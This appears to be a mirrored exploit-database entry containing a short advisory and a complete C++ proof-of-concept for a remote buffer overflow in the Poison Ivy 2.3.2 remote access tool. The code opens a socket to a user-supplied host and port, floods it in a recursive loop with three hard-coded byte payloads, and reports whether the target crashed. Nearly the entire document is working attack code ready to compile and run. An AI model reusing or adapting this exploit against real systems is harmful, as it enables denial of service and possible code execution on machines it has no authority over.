扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 |
// source: https://www.securityfocus.com/bid/48039/info Poison Ivy is prone to an unspecified buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Poison Ivy 2.3.2 is vulnerable; other versions may also be affected. # Exploit Title: Poison Ivy 2.3.2 (Latest version) remote buffer overflow # Google Dork: No dorks. # Date: 27/05/11 # Author: Kevin R.V <kevin.nullbyte@gmail.com> # Software Link: http://www.poisonivy-rat.com/dl.php?file=PI232 # Version: 2.3.2 # Tested on: Windows XP SP2 # CVE : No exist. /*Poison Ivy 2.3.2 Remote Buffer Overflow *Author: Kevin R.V <kevin.nullbyte@gmail.com> *Date: 2011 * License: Totally free 8-) * */ #include <iostream> #include <winsock2.h> #define VERS "0.1" int connected; using namespace std; char payload[] = { 0xb2, 0xa8, 0xc3, 0x17, 0x1c, 0x1b, 0x99, 0xb9, 0x4c, 0xab, 0x8b, 0x88, 0x3a, 0x20, 0x13, 0xb3, 0x72, 0x0e, 0x57, 0xbc, 0x9f, 0x81, 0xb9, 0x08, 0x61, 0x30, 0x87, 0x74, 0xea, 0x65, 0xb5, 0x4a, 0xc9, 0xfc, 0x87, 0xe3, 0x95, 0x9e, 0xcd, 0xcd, 0x40, 0x98, 0xd2, 0x1f, 0x31, 0xee, 0x96, 0x83, 0x3d, 0x0a, 0xfe, 0xb8, 0x9b, 0xf2, 0xe7, 0x10, 0x23, 0x64, 0xfe, 0xe9, 0x10, 0xc4, 0x9c, 0xf7, 0x29, 0xe5, 0x6b, 0xe3, 0x54, 0xbb, 0x18, 0x8b, 0x07, 0x81, 0x92, 0x5e, 0xbb, 0x35, 0x6f, 0xe4, 0x23, 0x4a, 0x0c, 0xd0, 0x1f, 0x3b, 0xd4, 0x9a, 0x5c, 0x94, 0xad, 0x8b, 0xed, 0xa4, 0xed, 0xb2, 0x14, 0x23, 0x04, 0xa5, 0xfd, 0x8e, 0x8c, 0x9b, 0xc8, 0x0f, 0x78, 0xbf, 0xf2, 0xe4, 0xfe, 0x28, 0xe9, 0x3c, 0x5d, 0x86, 0x16, 0xff, 0x59, 0x7d, 0x70, 0x6d, 0x18, 0x2d, 0xdf, 0x28, 0x66, 0x02, 0xde, 0xca, 0x20, 0xe6, 0xfd, 0xe7, 0xbf, 0x4d, 0xe8, 0x8c, 0x69, 0xdd, 0x40, 0x22, 0x8f, 0x2f, 0x55, 0x54, 0xb1, 0x60, 0x86, 0x29, 0xd0, 0x3d, 0xc7, 0x01, 0xb5, 0xdc, 0xbf, 0x63, 0x28, 0xd2, 0x4e, 0xe6, 0x29, 0xed, 0x5c, 0xee, 0x17, 0x53, 0xe1, 0x11, 0x5c, 0x61, 0x9b, 0xb0, 0xfc, 0x71, 0x6e, 0x46, 0xa9, 0x27, 0xa8, 0x21, 0x05, 0x67, 0x86, 0x24, 0x86, 0x01, 0xb8, 0xd7, 0x65, 0x11, 0x36, 0xe5, 0x16, 0x05, 0xdc, 0x8c, 0x7c, 0xa7, 0xb9, 0xee, 0xbe, 0xa6, 0xcf, 0x88, 0x67, 0x56, 0xaa, 0x61, 0xe3, 0x2c, 0x72, 0xbf, 0x5b, 0xee, 0x18, 0xc4, 0x65, 0x2c, 0x4a, 0x0d, 0x88, 0x2e, 0xad, 0x96, 0x67, 0xab, 0xc1, 0xb1, 0x95, 0x03, 0x36, 0xc8, 0x04, 0xbf, 0xe8, 0x29, 0x5a, 0xf5, 0x83, 0xe5, 0x5f, 0xe4, 0x0e, 0xe2, 0x6f, 0x6b, 0x93, 0x80, 0xe7, 0x25, 0xca, 0x44, 0xa8, 0x48 }; char payload2[] = { 0xc6, 0xa7, 0x53, 0xce, 0xdc, 0x1c, 0xdc, 0x74, 0x9a, 0xc7, 0x31, 0xdf, 0x2a, 0x21, 0x5f, 0x0e, 0x7e, 0xe6, 0x1e, 0xa1, 0xb5, 0x17, 0xc4, 0x9f, 0x4a, 0x7a, 0x81, 0xde, 0x90, 0x13, 0x37, 0x2d, 0x62, 0x3c, 0xb6, 0x10, 0x2d, 0x44, 0x57, 0xa2, 0xa0, 0xdd, 0xcb, 0x90, 0xd3, 0x83, 0x1a, 0xda, 0x89, 0x97, 0x68, 0x61, 0xce, 0x38, 0xc1, 0xc4, 0xe8, 0xb0, 0xfa, 0x0b, 0x64, 0x12, 0x73, 0xf0, 0x28, 0x24, 0x2b, 0x51, 0x78, 0x15, 0xfa, 0x27, 0xcc, 0xc7, 0x5c, 0x5c, 0x3a, 0xf8, 0xea, 0x5e, 0xd9, 0x6e, 0xd4, 0x96, 0xa0, 0x8d, 0x99, 0x13, 0x84, 0x99, 0xff, 0xba, 0x41, 0xed, 0xf3, 0x1c, 0x67, 0xb6, 0xaa, 0x5a, 0x95, 0xfd, 0x92, 0x23, 0x9a, 0x72, 0x86, 0xcd, 0xf6, 0xa1, 0xb9, 0x44, 0xbc, 0x15, 0xc3, 0xac, 0xaa, 0xd6, 0x65, 0xf1, 0x08, 0x19, 0xf5, 0x2a, 0x62, 0xe4, 0x0d, 0x4e, 0x14, 0x1f, 0x21, 0x4d, 0x0c, 0x22, 0x06, 0x98, 0x84, 0x74, 0xf7, 0xaa, 0x18, 0x90, 0xd7, 0xe5, 0x2d, 0x04, 0x45, 0xb4, 0x2f, 0xbc, 0xdc, 0x97, 0xd2, 0x9b, 0x25, 0xe5, 0x4d, 0xb3, 0x51, 0x5f, 0x1a, 0x93, 0xe4, 0x97, 0x51, 0xc7, 0xd9, 0x81, 0x52, 0xee, 0x11, 0x83, 0x51, 0xb1, 0xd5, 0x34, 0x6f, 0xf1, 0xea, 0x9e, 0xbf, 0x4b, 0x6e, 0x33, 0x0d, 0x8a, 0x73, 0x15, 0xb9, 0xde, 0x92, 0x53, 0xd3, 0xfd, 0x5a, 0xcf, 0x69, 0xde, 0x19, 0x29, 0x05, 0xa1, 0x50, 0x78, 0x14, 0x81, 0xe5, 0xf1, 0x74, 0xea, 0x8c, 0x82, 0x58, 0x93, 0x74, 0x4f, 0x5a, 0x77, 0xb5, 0xde, 0x17, 0xd1, 0x48, 0x44, 0x1b, 0x1f, 0x32, 0x30, 0x9f, 0x64, 0x7c, 0x22, 0x4e, 0xd4, 0x1a, 0xae, 0x77, 0x01, 0x2b, 0x1f }; char payload3[] = { 0xe0, 0xf5, 0x3d, 0xc1, 0xf0, 0xea, 0x15, 0xdb, 0x43, 0x3e, 0x65, 0xf8, 0x9b, 0xe2, 0x14, 0xba, 0x90, 0x48, 0x5c, 0xd5, 0xec, 0x70, 0xa3, 0x8b, 0x41, 0x72, 0x28, 0x50, 0xec, 0xf6, 0xd5, 0x2a, 0xe6, 0x06, 0x46, 0xb2, 0xc5, 0x0c, 0x96, 0x6a, 0x69, 0x86, 0x6b, 0x12, 0xe4, 0x93, 0xe5, 0x11 }; int PoC(char * host, unsigned int port) { WSADATA wsa; WSAStartup(MAKEWORD(2,0),&wsa); SOCKET sock; struct sockaddr_inlocal; sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); local.sin_family = AF_INET; local.sin_addr.s_addr = inet_addr(host); local.sin_port = htons(port); if (connect(sock, (struct sockaddr *)&local, sizeof(local) ) == 0 ) { connected = 1; cout << "."; for(long int i = 0; i<99; i++) { sendto(sock, payload, sizeof(payload), 0, (struct sockaddr *)&local,sizeof(local)); sendto(sock, payload2, sizeof(payload2), 0, (struct sockaddr *)&local,sizeof(local)); sendto(sock, payload3, sizeof(payload3), 0, (struct sockaddr *)&local,sizeof(local)); } PoC(host, port); } else { if ( connected ) cout << endl << endl << "[+] Congrats, poison-ivy crashed!!" << endl; else cout << endl << endl << "[-] Sorry not poison ivy detected 8-(" << endl; } } int main(int argc, char *argv[]) { cout << "Poison-ivy remote buffer overflow " VERS << endl << endl; cout << "by Kevin R.V <kevin.nullbyte@gmail.com" << endl; if ( argc < 2 ) { cout << "Usage: " << argv[0] << ".exe -h <ip> -p <port>" << endl << endl; exit(-1); } u_short port; char * ip; for(int i = 0; i<argc; i++) { if( ! strcmp(argv[i], "-h") != 0 ) ip = argv[i+1]; else if( ! strcmp(argv[i], "-p") != 0 ) port = atoi(argv[i+1]); } cout << "[+] Starting exploit" << endl << endl; PoC(ip, port); return 1; } |
体验盒子
